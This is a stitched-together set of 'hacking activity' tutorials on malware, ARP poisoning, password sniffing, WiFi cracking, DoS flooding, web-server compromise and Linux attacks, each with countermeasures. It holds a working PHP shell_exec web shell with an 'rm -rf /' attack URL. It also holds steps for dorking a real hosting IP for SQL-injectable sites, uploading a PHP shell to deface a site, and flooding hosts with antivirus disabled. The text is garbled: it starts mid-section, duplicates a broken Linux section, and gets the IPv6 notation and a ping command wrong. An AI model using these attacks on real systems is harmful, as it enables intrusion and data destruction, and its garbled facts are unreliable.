Install backdoors on the victim’s computers. The created backdoor may be used to create zombie computers that are used to send spam emails, perform distributed denial of service attacks, etc. the backdoors can also be exploited by other malware.
Worms may also slowdown the network by consuming the bandwidth as they replicate.
Install harmful payload code carried within the worm.
What is a Virus?
A virus is a computer program that attaches itself to legitimate programs and files without the user’s consent. Viruses can consume computer resources such as memory and CPU time. The attacked programs and files are said to be “infected”. A computer virus may be used to;
Access private data such as user id and passwords
Display annoying messages to the user
Corrupt data in your computer
Log the user’s keystrokes
Computer viruses have been known to employ social engineering techniques. These techniques involve deceiving the users to open the files which appear to be normal files such as Word or Excel documents. Once the file is opened, the virus code is executed and does what it’s intended to do.
Trojans, Viruses, and Worms counter measures
To protect against such attacks, an organization can use the following methods.
A policy that prohibits users from downloading unnecessary files from the Internet such as spam email attachments, games, programs that claim to speed up downloads, etc.
Anti-virus software must be installed on all user computers. The anti-virus software should be updated frequently, and scans must be performed at specified time intervals.
Scan external storage devices on an isolated machine especially those that originate from outside the organization.
Regular backups of critical data must be made and stored on preferably read-only media such as CDs and DVDs.
Worms exploit vulnerabilities in the operating systems. Downloading operating system updates can help reduce the infection and replication of worms.
Worms can also be avoided by scanning, all email attachments before downloading them.
Trojan, Virus, and Worm Differential Table
Learn ARP Poisoning with Examples
In this tutorial we will Learn -
What is IP and MAC Addresses
IP Address is the acronym for Internet Protocol address. An internet protocol address is used to uniquely identify a computer or device such as printers, storage disks on a computer network. There are currently two versions of IP addresses. IPv4 uses 32-bit numbers. Due to the massive growth of the internet, IPv6 has been developed, and it uses 128-bit numbers.
IPv4 addresses are formatted in four groups of numbers separated by dots. The minimum number is 0, and the maximum number is 255. An example of an IPv4 address looks like this;
127.0.0.1
IPv6 addresses are formatted in groups of six numbers separated by full colons. The group numbers are written as 4 hexadecimal digits. An example of an IPv6 address looks like this;
2001:0db8:85a3:0000:0000:8a2e:0370:7334
In order to simplify the representation of the IP addresses in text format, leading zeros are omitted, and the group of zeros is completed omitted. The above address in a simplified format is displayed as;
2001:db8:85a3:::8a2e:370:7334
MAC Address is the acronym for media access control address. MAC addresses are used to uniquely identify network interfaces for communication at the physical layer of the network. MAC addresses are usually embedded into the network card.
A MAC address is like a serial number of a phone while the IP address is like the phone number.
Exercise
We will assume you are using windows for this exercise. Open the command prompt.
Enter the command
ipconfig /all
You will get detailed information about all the network connections available on your computer. The results shown below are for a broadband modem to show the MAC address and IPv4 format and wireless network to show IPv6 format.
What is ARP Poisoning?
ARP is the acronym for Address Resolution Protocol. It is used to convert IP address to physical addresses [MAC address] on a switch. The host sends an ARP broadcast on the network, and the recipient computer responds with its physical address [MAC Address]. The resolved IP/MAC address is then used to communicate. ARP poisoning is sending fake MAC addresses to the switch so that it can associate the fake MAC addresses with the IP address of a genuine computer on a network and hijack the traffic.
ARP Poisoning Countermeasures
Static ARP entries: these can be defined in the local ARP cache and the switch configured to ignore all auto ARP reply packets. The disadvantage of this method is, it’s difficult to maintain on large networks. IP/MAC address mapping has to be distributed to all the computers on the network.
ARP poisoning detection software: these systems can be used to cross check the IP/MAC address resolution and certify them if they are authenticated. Uncertified IP/MAC address resolutions can then be blocked.
Operating System Security: this measure is dependent on the operating system been used. The following are the basic techniques used by various operating systems.
Linux based: these work by ignoring unsolicited ARP reply packets.
Microsoft Windows: the ARP cache behavior can be configured via the registry. The following list includes some of the software that can be used to protect networks against sniffing;
AntiARP– provides protection against both passive and active sniffing
Agnitum Outpost Firewall–provides protection against passive sniffing
XArp– provides protection against both passive and active sniffing
Mac OS: ArpGuard can be used to provide protection. It protects against both active and passive sniffing.
Hacking Activity: Configure ARP entries in Windows
We are using Windows 7 for this exercise, but the commands should be able to work on other versions of windows as well.
Open the command prompt and enter the following command
arp –a
HERE,
aprcalls the ARP configure program located in Windows/System32 directory
-a is the parameter to display to contents of the ARP cache
You will get results similar to the following
Note: dynamic entries are added and deleted automatically when using TCP/IP sessions with remote computers.
Static entries are added manually and are deleted when the computer is restarted, and the network interface card restarted or other activities that affect it.
Adding static entries
Open the command prompt then use the ipconfig /all command to get the IP and MAC address
The MAC address is represented using the Physical Address and the IP address is IPv4Address
Enter the following command
arp –s 192.168.1.38 60-36-DD-A6-C5-43
Note: The IP and MAC address will be different from the ones used here. This is because they are unique.
Use the following command to view the ARP cache
arp –a
You will get the following results
Note the IP address has been resolved to the MAC address we provided and it is of a static type.
Deleting an ARP cache entry
Use the following command to remove an entry
arp –d 192.168.1.38
P.S. ARP poisoning works by sending fake MAC addresses to the switch
Wireshark Tutorial: Network & Passwords Sniffer
Computers communicate using networks. These networks could be on a local area network LAN or exposed to the internet. Network Sniffers are programs that capture low-level package data that is transmitted over a network. An attacker can analyze this information to discover valuable information such as user ids and passwords.
In this article, we will introduce you to common network sniffing techniques and tools used to sniff networks. We will also look at countermeasures that you can put in place to protect sensitive information been transmitted over a network.
Topics covered in this tutorial
What is network sniffing?
Computers communicate by broadcasting messages on a network using IP addresses. Once a message has been sent on a network, the recipient computer with the matching IP address responds with its MAC address.
Network sniffing is the process of intercepting data packets sent over a network.This can be done by the specialized software program or hardware equipment. Sniffing can be used to;
Capture sensitive data such as login credentials
Eavesdrop on chat messages
Capture files have been transmitted over a network
The following are protocols that are vulnerable to sniffing
Telnet
Rlogin
HTTP
SMTP
NNTP
POP
FTP
IMAP
The above protocols are vulnerable if login details are sent in plain text
Passive and Active Sniffing
Before we look at passive and active sniffing, let’s look at two major devices used to network computers; hubs and switches.
A hub works by sending broadcast messages to all output ports on it except the one that has sent the broadcast. The recipient computer responds to the broadcast message if the IP address matches. This means when using a hub, all the computers on a network can see the broadcast message. It operates at the physical layer (layer 1) of the OSI Model.
The diagram below illustrates how the hub works.
A switch works differently; it maps IP/MAC addresses to physical ports on it. Broadcast messages are sent to the physical ports that match the IP/MAC address configurations for the recipient computer. This means broadcast messages are only seen by the recipient computer. Switches operate at the data link layer (layer 2) and network layer (layer 3).
The diagram below illustrates how the switch works.
Passive sniffing is intercepting packages transmitted over a network that uses a hub. It is called passive sniffing because it is difficult to detect. It is also easy to perform as the hub sends broadcast messages to all the computers on the network.
Active sniffing is intercepting packages transmitted over a network that uses a switch. There are two main methods used to sniff switch linked networks, ARP Poisoning, and MAC flooding.
Hacking Activity: Sniff network traffic
In this practical scenario, we are going to use Wireshark to sniff data packets as they are transmitted over HTTP protocol. For this example, we will sniff the network using Wireshark, then login to a web application that does not use secure communication. We will login to a web application on http://www.techpanda.org/
The login address is admin@google.com , and the password is Password2010.
Note: we will login to the web app for demonstration purposes only. The technique can also sniff data packets from other computers that are on the same network as the one that you are using to sniff. The sniffing is not only limited to techpanda.org, but also sniffs all HTTP and other protocols data packets.
Sniffing the network using Wireshark
The illustration below shows you the steps that you will carry out to complete this exercise without confusion
Download Wireshark from this link http://www.wireshark.org/download.html
Open Wireshark
You will get the following screen
Select the network interface you want to sniff. Note for this demonstration, we are using a wireless network connection. If you are on a local area network, then you should select the local area network interface.
Click on start button as shown above
Open your web browser and type in http://www.techpanda.org/
The login email is admin@google.com and the password is Password2010
Click on submit button
A successful logon should give you the following dashboard
Go back to Wireshark and stop the live capture
Filter for HTTP protocol results only using the filter textbox
Locate the Info column and look for entries with the HTTP verb POST and click on it
Just below the log entries, there is a panel with a summary of captured data. Look for the summary that says Line-based text data: application/x-www-form-urlencoded
You should be able to view the plaintext values of all the POST variables submitted to the server via HTTP protocol.
What is a MAC Flooding?
MAC flooding is a network sniffing technique that floods the switch MAC table with fake MAC addresses. This leads to overloading the switch memory and makes it act as a hub. Once the switch has been compromised, it sends the broadcast messages to all computers on a network. This makes it possible to sniff data packets as they sent on the network.
Counter Measures against MAC flooding
Some switches have the port security feature. This feature can be used to limit the number of MAC addresses on the ports. It can also be used to maintain a secure MAC address table in addition to the one provided by the switch.
Authentication, Authorization and Accounting servers can be used to filter discovered MAC addresses.
Sniffing Counter Measures
Restriction to network physical media highly reduces the chances of a network sniffer been installed
Encrypting messages as they are transmitted over the network greatly reduces their value as they are difficult to decrypt.
Changing the network to a Secure Shell (SSH)network also reduces the chances of the network been sniffed.
Summary
Network sniffing is intercepting packages as they are transmitted over the network
Passive sniffing is done on a network that uses a hub. It is difficult to detect.
Active sniffing is done on a network that uses a switch. It is easy to detect.
MAC flooding works by flooding the MAC table address list with fake MAC addresses. This makes the switch to operate like a HUB
Security measures as outlined above can help protect the network against sniffing.
How to Hack WiFi (Wireless) Network
Wireless networks are accessible to anyone within the router’s transmission radius. This makes them vulnerable to attacks. Hotspots are available in public places such as airports, restaurants, parks, etc.
In this tutorial, we will introduce you to common techniques used to exploit weaknesses in wireless network security implementations. We will also look at some of the countermeasures you can put in place to protect against such attacks.
Topics covered in this tutorial
What is a wireless network?
A wireless network is a network that uses radio waves to link computers and other devices together. The implementation is done at the Layer 1 (physical layer) of the OSI model.
How to access a wireless network?
You will need a wireless network enabled device such as a laptop, tablet, smartphones, etc. You will also need to be within the transmission radius of a wireless network access point. Most devices (if the wireless network option is turned on) will provide you with a list of available networks. If the network is not password protected, then you just have to click on connect. If it is password protected, then you will need the password to gain access.
Wireless Network Authentication
Since the network is easily accessible to everyone with a wireless network enabled device, most networks are password protected. Let’s look at some of the most commonly used authentication techniques.
WEP
WEP is the acronym for Wired Equivalent Privacy. It was developed for IEEE 802.11 WLAN standards. Its goal was to provide the privacy equivalent to that provided by wired networks. WEP works by encrypting the data been transmitted over the network to keep it safe from eavesdropping.
WEP Authentication
Open System Authentication (OSA) – this methods grants access to station authentication requested based on the configured access policy.
Shared Key Authentication (SKA) – This method sends to an encrypted challenge to the station requesting access. The station encrypts the challenge with its key then responds. If the encrypted challenge matches the AP value, then access is granted.
WEP Weakness
WEP has significant design flaws and vulnerabilities.
The integrity of the packets is checked using Cyclic Redundancy Check (CRC32). CRC32 integrity check can be compromised by capturing at least two packets. The bits in the encrypted stream and the checksum can be modified by the attacker so that the packet is accepted by the authentication system. This leads to unauthorized access to the network.
WEP uses the RC4 encryption algorithm to create stream ciphers. The stream cipher input is made up of an initial value (IV) and a secret key. The length of the initial value (IV) is 24 bits long while the secret key can either be 40 bits or 104 bits long. The total length of both the initial value and secret can either be 64 bits or 128 bits long.The lower possible value of the secret key makes it easy to crack it.
Weak Initial values combinations do not encrypt sufficiently. This makes them vulnerable to attacks.
WEP is based on passwords; this makes it vulnerable to dictionary attacks.
Keys management is poorly implemented. Changing keys especially on large networks is challenging. WEP does not provide a centralized key management system.
The Initial values can be reused
Because of these security flaws, WEP has been deprecated in favor of WPA
WPA
WPA is the acronym for Wi-Fi Protected Access. It is a security protocol developed by the Wi-Fi Alliance in response to the weaknesses found in WEP. It is used to encrypt data on 802.11 WLANs. It uses higher Initial Values 48 bits instead of the 24 bits that WEP uses. It uses temporal keys to encrypt packets.
WPA Weaknesses
The collision avoidance implementation can be broken
It is vulnerable to denial of service attacks
Pre-shares keys use passphrases. Weak passphrases are vulnerable to dictionary attacks.
How to Crack Wireless Networks
WEP cracking
Cracking is the process of exploiting security weaknesses in wireless networks and gaining unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks namely;
Passive cracking– this type of cracking has no effect on the network traffic until the WEP security has been cracked. It is difficult to detect.
Active cracking– this type of attack has an increased load effect on the network traffic. It is easy to detect compared to passive cracking. It is more effective compared to passive cracking.
WEP Cracking Tools
Aircrack– network sniffer and WEP cracker. Can be downloaded from http://www.aircrack-ng.org/
WEPCrack– this is an open source program for breaking 802.11 WEP secret keys. It is an implementation of the FMS attack. http://wepcrack.sourceforge.net/
Kismet- this can include detector wireless networks both visible and hidden, sniffer packets and detect intrusions. http://www.kismetwireless.net/
WebDecrypt– this tool uses active dictionary attacks to crack the WEP keys. It has its own key generator and implements packet filters. http://wepdecrypt.sourceforge.net/
WPA Cracking
WPA uses a 256 pre-shared key or passphrase for authentications. Short passphrases are vulnerable to dictionary attacks and other attacks that can be used to crack passwords. The following tools can be used to crack WPA keys.
CowPatty– this tool is used to crack pre-shared keys (PSK) using brute force attack. http://wirelessdefence.org/Contents/coWPAttyMain.htm
Cain & Abel– this tool can be used to decode capture files from other sniffing programs such as Wireshark. The capture files may contain WEP or WPA-PSK encoded frames. http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml
General Attack types
Sniffing– this involves intercepting packets as they are transmitted over a network. The captured data can then be decoded using tools such as Cain & Abel.
Man in the Middle (MITM) Attack– this involves eavesdropping on a network and capturing sensitive information.
Denial of Service Attack– the main intent of this attack is to deny legitimate users network resources. FataJack can be used to perform this type of attack. More on this in article
Cracking Wireless network WEP/WPA keys
It is possible to crack the WEP/WPA keys used to gain access to a wireless network. Doing so requires software and hardware resources, and patience. The success of such attacks can also depend on how active and inactive the users of the target network are.
We will provide you with basic information that can help you get started. Backtrack is a Linux-based security operating system. It is developed on top of Ubuntu. Backtrack comes with a number of security tools. Backtrack can be used to gather information, assess vulnerabilities and perform exploits among other things.
Some of the popular tools that backtrack has includes;
Metasploit
Wireshark
Aircrack-ng
NMap
Ophcrack
Cracking wireless network keys requires patience and resources mentioned above. At a minimum, you will need the following tools
A wireless network adapter with the capability to inject packets (Hardware)
Kali Operating System. You can download it from here https://www.kali.org/downloads/
Be within the target network’s radius. If the users of the target network are actively using and connecting to it, then your chances of cracking it will be significantly improved.
Sufficient knowledge of Linux based operating systems and working knowledge of Aircrack and its various scripts.
Patience, cracking the keys may take a bit of sometime depending on a number of factors some of which may be beyond your control. Factors beyond your control include users of the target network using it actively as you sniff data packets.
How to Secure wireless networks
In minimizing wireless network attacks; an organization can adopt the following policies
Changing default passwords that come with the hardware
Enabling the authentication mechanism
Access to the network can be restricted by allowing only registered MAC addresses.
Use of strong WEP and WPA-PSK keys, a combination of symbols, number and characters reduce the chance of the keys been cracking using dictionary and brute force attacks.
Firewall Software can also help reduce unauthorized access.
Hacking Activity: Crack Wireless Password
In this practical scenario, we are going touse Cain and Abel to decode the stored wireless network passwords in Windows. We will also provide useful information that can be used to crack the WEP and WPA keys of wireless networks.
Decoding Wireless network passwords stored in Windows
Download Cain & Abel from the link provided above.
Open Cain and Abel
Ensure that the Decoders tab is selected then click on Wireless Passwords from the navigation menu on the left-hand side
Click on the button with a plus sign
Assuming you have connected to a secured wireless network before, you will get results similar to the ones shown below
The decoder will show you the encryption type, SSID and the password that was used.
Summary
Wireless network transmission waves can be seen by outsiders, this possesses many security risks.
WEP is the acronym for Wired Equivalent Privacy. It has security flaws which make it easier to break compared to other security implementations.
WPA is the acronym for Wi-Fi Protected Access. It has security compared to WEP
Intrusion Detection Systems can help detect unauthorized access
A good security policy can help protect a network.
DoS (Denial of Service) Attack Tutorial: Ping of Death, DDOS
What is DoS Attack?
DOS is an attack used to deny legitimate users access to a resource such as accessing a website, network, emails, etc. or making it extremely slow. DoS is the acronym for Denial of Service. This type of attack is usually implemented by hitting the target resource such as a web server with too many requests at the same time. This results in the server failing to respond to all the requests. The effect of this can either be crashing the servers or slowing them down.
Cutting off some business from the internet can lead to significant loss of business or money. The internet and computer networks power a lot of businesses. Some organizations such as payment gateways, e-commerce sites entirely depend on the internet to do business.
In this tutorial, we will introduce you to what denial of service attack is, how it is performed and how you can protect against such attacks.
Topics covered in this tutorial
Types of Dos Attacks
There are two types of Dos attacks namely;
DoS– this type of attack is performed by a single host
Distributed DoS– this type of attack is performed by a number of compromised machines that all target the same victim. It floods the network with data packets.
How DoS attacks work
Let’s look at how DoS attacks are performed and the techniques used. We will look at five common types of attacks.
Ping of Death
The ping command is usually used to test the availability of a network resource. It works by sending small data packets to the network resource. The ping of death takes advantage of this and sends data packets above the maximum limit (65,536 bytes) that TCP/IP allows. TCP/IP fragmentation breaks the packets into small chunks that are sent to the server. Since the sent data packages are larger than what the server can handle, the server can freeze, reboot, or crash.
Smurf
This type of attack uses large amounts of Internet Control Message Protocol (ICMP) ping traffic target at an Internet Broadcast Address. The reply IP address is spoofed to that of the intended victim. All the replies are sent to the victim instead of the IP used for the pings. Since a single Internet Broadcast Address can support a maximum of 255 hosts, a smurf attack amplifies a single ping 255 times. The effect of this is slowing down the network to a point where it is impossible to use it.
Buffer overflow
A buffer is a temporal storage location in RAM that is used to hold data so that the CPU can manipulate it before writing it back to the disc. Buffers have a size limit. This type of attack loads the buffer with more data that it can hold. This causes the buffer to overflow and corrupt the data it holds. An example of a buffer overflow is sending emails with file names that have 256 characters.
Teardrop
This type of attack uses larger data packets. TCP/IP breaks them into fragments that are assembled on the receiving host. The attacker manipulates the packets as they are sent so that they overlap each other. This can cause the intended victim to crash as it tries to re-assemble the packets.
SYN attack
SYN is a short form for Synchronize. This type of attack takes advantage of the three-way handshake to establish communication using TCP. SYN attack works by flooding the victim with incomplete SYN messages. This causes the victim machine to allocate memory resources that are never used and deny access to legitimate users.
DoS attack tools
The following are some of the tools that can be used to perform DoS attacks.
Nemesy– this tool can be used to generate random packets. It works on windows. This tool can be downloaded from http://packetstormsecurity.com/files/25599/nemesy13.zip.html . Due to the nature of the program, if you have an antivirus, it will most likely be detected as a virus.
Land and LaTierra– this tool can be used for IP spoofing and opening TCP connections
Blast– this tool can be downloaded from http://www.opencomm.co.uk/products/blast/features.php
Panther- this tool can be used to flood a victim’s network with UDP packets.
Botnets– these are multitudes of compromised computers on the Internet that can be used to perform a distributed denial of service attack.
DoS Protection: Prevent an attack
An organization can adopt the following policy to protect itself against Denial of Service attacks.
Attacks such as SYN flooding take advantage of bugs in the operating system. Installing security patches can help reduce the chances of such attacks.
Intrusion detection systems can also be used to identify and even stop illegal activities
Firewalls can be used to stop simple DoS attacks by blocking all traffic coming from an attacker by identifying his IP.
Routers can be configured via the Access Control List to limit access to the network and drop suspected illegal traffic.
Hacking Activity: Ping of Death
We will assume you are using Windows for this exercise. We will also assume that you have at least two computers that are on the same network. DOS attacks are illegal on networks that you are not authorized to do so. This is why you will need to setup your own network for this exercise.
Open the command prompt on the target computer
Enter the command ipconfig. You will get results similar to the ones shown below
For this example, we are using Mobile Broadband connection details. Take note of the IP address. Note: for this example to be more effective, and you must use a LAN network.
Switch to the computer that you want to use for the attack and open the command prompt
We will ping our victim computer with infinite data packets of 65500
Enter the following command
ping 10.128.131.108 –t |65500
HERE,
“ping” sends the data packets to the victim
“10.128.131.108” is the IP address of the victim
“-t” means the data packets should be sent until the program is stopped
“-l” specifies the data load to be sent to the victim
You will get results similar to the ones shown below
Flooding the target computer with data packets doesn’t have much effect on the victim. In order for the attack to be more effective, you should attack the target computer with pings from more than one computer.
The above attack can be used to attacker routers, web servers etc.
If you want to see the effects of the attack on the target computer, you can open the task manager and view the network activities.
Right click on the taskbar
Select start task manager
Click on the network tab
You will get results similar to the following
If the attack is successful, you should be able to see increased network activities.
Hacking Activity: Launch a DOS attack
In this practical scenario, we are going to use Nemesy to generate data packets and flood the target computer, router or server.
As stated above, Nemesy will be detected as an illegal program by your anti-virus. You will have to disable the anti-virus for this exercise.
Download Nemesy from http://packetstormsecurity.com/files/25599/nemesy13.zip.html
Unzip it and run the program Nemesy.exe
You will get the following interface
Enter the target IP address, in this example; we have used the target IP we used in the above example.
HERE,
0 as the number of packets means infinity. You can set it to the desired number if you do not want to send, infinity data packets
The size field specifies the data bytes to be sent and the delay specifies the time interval in milliseconds.
Click on send button
You should be able to see the following results
The title bar will show you the number of packets sent
Click on halt button to stop the program from sending data packets.
You can monitor the task manager of the target computer to see the network activities.
Summary
A denial of service attack’s intent is to deny legitimate users access to a resource such as a network, server etc.
There are two types of attacks, denial of service and distributed denial of service.
A denial of service attack can be carried out using SYN Flooding, Ping of Death, Teardrop, Smurf or buffer overflow
Security patches for operating systems, router configuration, firewalls and intrusion detection systems can be used to protect against denial of service attacks.
How to Hack a Web Server
Customers usually turn to the internet to get information and buy products and services. Towards that end, most organizations have websites.Most websites store valuable information such as credit card numbers, email address and passwords, etc. This has made them targets to attackers. Defaced websites can also be used to communicate religious or political ideologies etc.
In this tutorial, we will introduce you toweb servers hacking techniques and how you can protect servers from such attacks.
In this tutorial, you will learn:
Web server vulnerabilities
A web server is a program that stores files (usually web pages) and makes them accessible via the network or the internet. A web server requires both hardware and software. Attackers usually target the exploits in the software to gain authorized entry to the server. Let’s look at some of the common vulnerabilities that attackers take advantage of.
Default settings– These settings such as default user id and passwords can be easily guessed by the attackers. Default settings might also allow performing certain tasks such as running commands on the server which can be exploited.
Misconfigurationof operating systems and networks – certain configuration such as allowing users to execute commands on the server can be dangerous if the user does not have a good password.
Bugs in the operating system and web servers– discovered bugs in the operating system or web server software can also be exploited to gain unauthorized access to the system.
In additional to the above-mentioned web server vulnerabilities, the following can also led to unauthorized access
Lack of security policy and procedures– lack of a security policy and procedures such as updating antivirus software, patching the operating system and web server software can create security loop holes for attackers.
Types of Web Servers
The following is a list of the common web servers
Apache– This is the commonly used web server on the internet. It is cross platform but is it’s usually installed on Linux. Most PHP websites are hosted on Apache servers.
Internet Information Services (IIS)– It is developed by Microsoft. It runs on Windows and is the second most used web server on the internet. Most asp and aspx websites are hosted on IIS servers.
Apache Tomcat – Most Java server pages (JSP) websites are hosted on this type of web server.
Other web servers – These include Novell's Web Server and IBM’s Lotus Domino servers.
Types of Attacks against Web Servers
Directory traversal attacks– This type of attacks exploits bugs in the web server to gain unauthorized access to files and folders that are not in the public domain. Once the attacker has gained access, they can download sensitive information, execute commands on the server or install malicious software.
Denial of Service Attacks– With this type of attack, the web server may crash or become unavailable to the legitimate users.
Domain Name System Hijacking – With this type of attacker, the DNS setting are changed to point to the attacker’s web server. All traffic that was supposed to be sent to the web server is redirected to the wrong one.
Sniffing– Unencrypted data sent over the network may be intercepted and used to gain unauthorized access to the web server.
Phishing– With this type of attack, the attack impersonates the websites and directs traffic to the fake website. Unsuspecting users may be tricked into submitting sensitive data such as login details, credit card numbers, etc.
Pharming– With this type of attack, the attacker compromises the Domain Name System (DNS) servers or on the user computer so that traffic is directed to a malicious site.
Defacement– With this type of attack, the attacker replaces the organization’s website with a different page that contains the hacker’s name, images and may include background music and messages.
Effects of successful attacks
An organization’s reputation can be ruined if the attacker edits the website content and includes malicious information or links to a porn website
The web server can be used to install malicious software on users who visit the compromised website. The malicious software downloaded onto the visitor’s computer can be a virus, Trojan or Botnet Software, etc.
Compromised user data may be used for fraudulent activities which may lead to business loss or lawsuits from the users who entrusted their details with the organization
Web server attack tools
Some of the common web server attack tools include;
Metasploit– this is an open source tool for developing, testing and using exploit code. It can be used to discover vulnerabilities in web servers and write exploits that can be used to compromise the server.
MPack– this is a web exploitation tool. It was written in PHP and is backed by MySQL as the database engine. Once a web server has been compromised using MPack, all traffic to it is redirected to malicious download websites.
Zeus– this tool can be used to turn a compromised computer into a bot or zombie. A bot is a compromised computer which is used to perform internet-based attacks. A botnet is a collection of compromised computers. The botnet can then be used in a denial of service attack or sending spam mails.
Neosplit – this tool can be used to install programs, delete programs, replicating it, etc.
How to avoid attacks on Web server
An organization can adopt the following policy to protect itself against web server attacks.
Patch management– this involves installing patches to help secure the server. A patch is an update that fixes a bug in the software. The patches can be applied to the operating system and the web server system.
Secure installation and configuration of the operating system
Secure installation and configuration of the web server software
Vulnerability scanning system– these include tools such as Snort, NMap, Scanner Access Now Easy (SANE)
Firewalls can be used to stop simple DoS attacks by blocking all traffic coming the identify source IP addresses of the attacker.
Antivirus software can be used to remove malicious software on the server
Disabling Remote Administration
Default accounts and unused accounts must be removed from the system
Default ports & settings (like FTP at port 21) should be changed to custom port & settings (FTP port at 5069)
Hacking Activity: Hack a WebServer
In this practical scenario, we are going to look at the anatomy of a web server attack. We will assume we are targeting www.techpanda.org. We are not actually going to hack into it as this is illegal. We will only use the domain for educational purposes.
What we will need
A target www.techpanda.org
Bing search engine
SQL Injection Tools
PHP Shell, we will use dk shell http://sourceforge.net/projects/icfdkshell/
Information gathering
We will need to get the IP address of our target and find other websites that share the same IP address.
We will use an online tool to find the target’s IP address and other websites sharing the IP address
Enter the URL http://www.yougetsignal.com/tools/web-sites-on-web-server/ in your web browser
Enter www.techpanda.org as the target
Click on Check button
You will get the following results
Based on the above results, the IP address of the target is 69.195.124.112
We also found out that there are 403 domains on the same web server.
Our next step is to scan the other websites for SQL injection vulnerabilities. Note: if we can find a SQL vulnerable on the target, then we would directly exploit it without considering other websites.
Enter the URL www.bing.com into your web browser. This will only work with Bing so don’t use other search engines such as google or yahoo
Enter the following search query
ip:69.195.124.112 .php?id=
HERE,
“ip:69.195.124.112” limits the search to all the websites hosted on the web server with IP address 69.195.124.112
“.php?id=” search for URL GET variables used a parameters for SQL statements.
You will get the following results
As you can see from the above results, all the websites using GET variables as parameters for SQL injection have been listed.
The next logic step would be to scan the listed websites for SQL Injection vulnerabilities. You can do this using manual SQL injection or use tools listed in this article on SQL Injection.
Uploading the PHP Shell
We will not scan any of the websites listed as this is illegal. Let’s assume that we have managed to login into one of them. You will have to upload the PHP shell that you downloaded from http://sourceforge.net/projects/icfdkshell/
Open the URL where you uploaded the dk.php file.
You will get the following window
Clicking the Symlink URL will give you access to the files in the target domain.
Once you have access to the files, you can get login credentials to the database and do whatever you want such as defacement, downloading data such as emails, etc.
Summary
Web server stored valuable information and are accessible to the public domain. This makes them targets for attackers.
The commonly used web servers include Apache and Internet Information Service IIS
Attacks against web servers take advantage of the bugs and Misconfiguration in the operating system, web servers, and networks
Popular web server hacking tools include Neosploit, MPack, and ZeuS.
A good security policy can reduce the chances of been attacked
HaHacking Linux OS: Complete Tutorial with Ubuntu Example
Linux is the most widely used server operating system, especially for web servers. It is open source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux Hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.
In this article, we will introduce you to what Linux is, its security vulnerabilities and the counter measures you can put in place.
Topics covered in this tutorial
Quick Note on Linux
Linux Hacking Tools
How to prevent Linux hacks
Hacking Activity: Hack a Linux system using PHP
Quick Note on Linux
Linux is an open source operating system. There are many distributions of Linux-based operating systems such as Redhat, Fedora, and Ubuntu, etc. Unlike other operating system, Linux is less secure when it comes to security. This is because the source code is available freely, so it is easy to study it for vulnerabilities and exploit them compared to other operating systems that are not open source. Linux can be used as a server, desktop, tablet, or mobile device operating system.
Linux programs can be operated using either GUI or commands. The commands are more effective and efficient compared to using the GUI. For this reason, it helps to know Linux basic commands.
Refer to these tutorials https://www.guru99.com/unix-linux-tutorial.html on how to get started with Linux.
Linux Hacking Tools
Nessus– this tool can be used to scan configuration settings, patches, and networks etc. it can be found at http://www.tenable.com/products/nessus
NMap. This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at http://nmap.org/
SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at http://www-arc.com/sara/sara.html
The above list is not exhaustive; it gives you an idea of the tools available for hacking Linux systems.
How to prevent Linux hacks
Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.
Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common passwords to application, default user names and some port numbers should be changed.
Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.
Hacking Activity: Hack a Ubuntu Linux System using PHP
In this practical scenario, we will provide you with basic information on how you can use PHP to compromise a Linux. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.
PHP comes with two functions that can be used to execute Linux commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as a string.
For demonstration purposes, let’s assume the attacker managers to upload the following file on a web server.
<?php
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "executing shell command:-> $cmd</br>";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
?>
HERE,
The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results returned in the browser.
The above code can be exploited using the following URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HERE,
“…konsole.php?cmd=ls%20-l”assigns the value ls –l to the variable cmd.
The command executed against the server will be
shell_exec('ls -l') ;
Executing the above code on a web server gives results similar to the following.
The above command simply displays the files in the current directory and the permissions
Let’s suppose the attacker passes the following command
rm -rf /
HERE,
“rm” removes the files
“rf” makes the rm command run in a recursive mode. Deleting all the folders and files
“/” instructs the command to start deleting files from the root directory
The attack URL would look something like this
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Summary
Linux is a popular operating system for servers, desktops, tablets and mobile devices.
Linux is open source, and the source code can be obtained by anyone. This makes it easy to spot the vulnerabilities.
Basic and networking commands are valuable to Linux hackers.
Vulnerabilities are a weakness that can be exploited to compromise a system.
A good security can help to protect a system from been compromised by an attacker.
cking Linux OS: Complete Tutorial with Ubuntu Example
Linux is the most widely used server operating system, especially for web servers. It is open source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux Hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.
In this article, we will introduce you to what Linux is, its security vulnerabilities and the counter measures you can put in place.
Topics covered in this tutorial
Quick Note on Linux
Linux is an open source operating system. There are many distributions of Linux-based operating systems such as Redhat, Fedora, and Ubuntu, etc. Unlike other operating system, Linux is less secure when it comes to security. This is because the source code is available freely, so it is easy to study it for vulnerabilities and exploit them compared to other operating systems that are not open source. Linux can be used as a server, desktop, tablet, or mobile device operating system.
Linux programs can be operated using either GUI or commands. The commands are more effective and efficient compared to using the GUI. For this reason, it helps to know Linux basic commands.
Refer to these tutorials https://www.guru99.com/unix-linux-tutorial.html on how to get started with Linux.
Linux Hacking Tools
